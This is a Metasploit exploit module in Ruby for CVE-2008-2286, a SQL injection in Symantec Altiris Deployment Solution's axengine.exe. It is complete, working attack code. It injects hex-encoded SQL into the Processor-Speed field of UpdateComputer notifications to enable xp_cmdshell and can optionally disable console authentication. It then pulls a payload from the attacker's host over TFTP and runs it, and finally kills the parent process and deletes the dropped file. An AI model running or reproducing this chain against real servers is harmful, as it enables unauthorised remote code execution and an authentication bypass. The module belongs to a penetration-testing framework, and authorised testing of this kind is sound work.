Path: blob/master/modules/exploits/windows/misc/altiris_ds_sqli.rb
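##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::CmdStager
  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Symantec Altiris DS SQL Injection',
        'Description' => %q{
          This module exploits a SQL injection flaw in Symantec Altiris Deployment Solution 6.8
          to 6.9.164. The vulnerability exists on axengine.exe which fails to adequately sanitize
          numeric input fields in "UpdateComputer" notification Requests. In order to spawn a shell,
          several SQL injections are required in close succession, first to enable xp_cmdshell, then
          retrieve the payload via TFTP and finally execute it. The module also has the capability
          to disable or enable local application authentication. In order to work the target system
          must have a tftp client available.
        },
        'Author' => [
          'Brett Moore', # Vulnerability discovery
          '3v0lver' # Metasploit module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2008-2286' ],
          [ 'OSVDB', '45313' ],
          [ 'BID', '29198'],
          [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-08-024' ]
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'process',
        },
        'Targets' => [
          [
            'Windows 2003 (with tftp client available)',
            {
              'Arch' => ARCH_X86,
              'Platform' => 'win'
            }
          ]
        ],
        'Privileged' => true,
        'Platform' => 'win',
        'DisclosureDate' => '2008-05-15',
        'DefaultTarget' => 0,
        'Compat' => {
          'Meterpreter' => {
            'Commands' => %w[
              stdapi_fs_delete_file
              stdapi_sys_config_getenv
              stdapi_sys_process_attach
              stdapi_sys_process_get_processes
              stdapi_sys_process_kill
            ]
          }
        },
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          # The payload executable is dropped into %TEMP% on the target, and the
          # sp_configure/reconfigure statements (plus the optional
          # wc_upd_disable_security call) persistently alter server configuration.
          'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES]
        }
      )
    )

    register_options(
      [
        Opt::RPORT(402),
        OptBool.new('XP_CMDSHELL', [ true, "Enable xp_cmdshell prior to exploit", true]),
        # DISABLE_SECURITY changes the target's console authentication setting; it is
        # not undone by this module unless ENABLE_SECURITY is run afterwards.
        OptBool.new('DISABLE_SECURITY', [ true, "Exploit SQLi to execute wc_upd_disable_security and disable Console Authentication", false ]),
        OptBool.new('ENABLE_SECURITY', [ true, "Enable Local Deployment Console Authentication", false ])
      ]
    )
    # Only the tftp flavor fits the SQLi size constraint, so the stager cannot be chosen by the user.
    deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')

    self.needs_cleanup = true
  end

  # CmdStager callback: turns one command line of the stager into one or more
  # UpdateComputer notifications, each carrying a hex-encoded SQL batch in the
  # Processor-Speed field.
  #
  # The first call additionally sends the one-shot preparatory statements selected
  # by the XP_CMDSHELL / DISABLE_SECURITY / ENABLE_SECURITY options; the instance
  # flags are cleared afterwards so they are not resent for every stager line.
  #
  # @param cmd [String, nil] command to run through xp_cmdshell; nil sends only the
  #   preparatory statements
  # @param opts [Hash] unused, present for CmdStager's calling convention
  # @return [void]
  def execute_command(cmd, opts = {})
    inject = []

    if @xp_shell_enable
      inject += [
        Rex::Text.to_hex('sp_configure "show advanced options", 1; reconfigure', ''),
        Rex::Text.to_hex('sp_configure "xp_cmdshell", 1; reconfigure', '')
      ]
      @xp_shell_enable = false
    end

    if @wc_disable_security
      inject << Rex::Text.to_hex('wc_upd_disable_security', '')
      @wc_disable_security = false
    end

    if @wc_enable_security
      inject << Rex::Text.to_hex('wc_upd_enable_security', '')
      @wc_enable_security = false
    end

    inject << Rex::Text.to_hex("master.dbo.xp_cmdshell 'cd %TEMP% && cmd.exe /c #{cmd}'", '') unless cmd.nil?

    # 2659 is a plausible processor speed; the batch is passed hex-encoded so no
    # quoting is needed inside the numeric field.
    inject.each do |sqli|
      send_update_computer("2659, null, null;declare @querya VARCHAR(255);select @querya = 0x#{sqli};exec(@querya);--")
    end
  end

  # Sends a single UpdateComputer notification to RHOST:RPORT and returns the
  # raw reply.
  #
  # The socket is always closed, even when put/get raise, so a failed
  # notification does not leak the connection.
  #
  # @param processor_speed [String] value placed verbatim into the Processor-Speed
  #   field (the injection point)
  # @return [String, nil] response from the server, nil if nothing was read
  # @raise [Rex::ConnectionError] when the TCP connection cannot be established
  def send_update_computer(processor_speed)
    notification = %Q|Request=UpdateComputer
OS-Bit=32
CPU-Arch=x86
IP-Address=192.168.20.107
MAC-Address=005056C000AB
Name=Remove_test
OS=Windows XP
Version=2.6-38 (32-Bit)
LoggedIn=Yes
Boot-Env=Automation
Platform=Linux
Agent-Settings=Same
Sys-Info-TimeZoneBias=0
Processor=Genuine Intel Intel(R) Core(TM) i7 CPU M 620 @ 2.67GHz
Processor-Speed=#{processor_speed}
\x00
|

    connect
    begin
      sock.put(notification)
      sock.get_once
    ensure
      disconnect
    end
  end

  # Fingerprints the Deployment Solution version from a benign UpdateComputer
  # reply and maps it to a CheckCode.
  #
  # @return [Exploit::CheckCode] Appears for 6.8.x builds below 390 and 6.9.x
  #   builds below 176, Safe for other 6.x versions, Unknown when no usable
  #   reply was obtained
  def check
    res = send_update_computer('2659')
    return Exploit::CheckCode::Unknown unless res&.include?('Result=Success')

    ds_version = res.match(/DSVersion=(.*)/)
    return Exploit::CheckCode::Unknown unless ds_version

    # strip so a CRLF-terminated reply ("6.9.164\r") still parses
    version = ds_version[1].strip
    parsed = version.match(/\A6\.(\d+)\.(\d+)\z/)
    return Exploit::CheckCode::Safe unless parsed

    vprint_status("#{rhost}:#{rport} - Altiris DS Version '#{version}'")

    minor, build = parsed.captures.map(&:to_i)

    # 6.8 builds 206/282/378 were observed vulnerable; anything below 390 is treated
    # the same. The existence of 6.9 versions below 176 is a possibility... none
    # were observed in the wild though, as such, we're basing confidence off of
    # Symantec's vulnerability bulletin.
    vulnerable = (minor == 8 && build < 390) || (minor == 9 && build < 176)
    return Exploit::CheckCode::Appears if vulnerable

    Exploit::CheckCode::Safe
  rescue ::Rex::ConnectionError => e
    vprint_error("#{rhost}:#{rport} - Connection failed: #{e.message}")
    Exploit::CheckCode::Unknown
  end

  # Entry point: arms the one-shot flags read by execute_command and hands the
  # payload delivery to the tftp CmdStager.
  def exploit
    @wc_disable_security = datastore['DISABLE_SECURITY']
    @wc_enable_security = datastore['ENABLE_SECURITY']
    @xp_shell_enable = datastore['XP_CMDSHELL']

    # CmdStagerVBS was tested here as well, however delivery took roughly
    # 30 minutes and required sending almost 350 notification messages.
    # size constraint requirement for SQLi is: linemax => 393
    tftphost = datastore['SRVHOST'] == '0.0.0.0' ? Rex::Socket.source_address : datastore['SRVHOST']
    execute_cmdstager({ delay: 1.5, tftphost: tftphost, temp: '%TEMP%\\', flavor: :tftp })
  end

  # Session callback: best-effort removal of the dropped payload executable.
  #
  # Only meterpreter sessions are cleaned up automatically; for any other
  # session type the user is told which file to delete.
  #
  # @param client [Msf::Session] the newly created session
  # @return [void]
  def on_new_session(client)
    return unless stager_instance.payload_exe

    # can't scrub dropped payload while the process is still active so...
    # iterate through process list, find our process and the associated
    # parent process ID, Kill the parent.
    # This module doesn't use FileDropper because of timing issues when
    # using migrate -f and FileDropper. On the other hand PrependMigrate
    # has been avoided because of older issues with reverse_https payload

    unless client.type == 'meterpreter'
      print_error("Automatic cleanup only available with meterpreter, please delete #{stager_instance.payload_exe} manually")
      return
    end

    client.core.use('stdapi') unless client.ext.aliases.include?('stdapi')
    print_status('Migrating ...')
    client.console.run_single('run migrate -f')

    # kill the parent process so the payload can hopefully be dropped;
    # resolve our own pid once rather than opening a handle per process entry
    print_status('Kill parent process ...')
    current_pid = client.sys.process.open.pid
    own_entry = client.sys.process.get_processes.find { |entry| entry['pid'] == current_pid }
    client.sys.process.kill(own_entry['ppid']) if own_entry

    win_temp = client.sys.config.getenv('TEMP')
    win_file = "#{win_temp}\\#{stager_instance.payload_exe}"
    print_status("Attempting to delete #{win_file} ...")
    client.shell_command_token("attrib.exe -r #{win_file}")
    client.fs.file.rm(win_file)
    print_good("Deleted #{win_file}")
  end
end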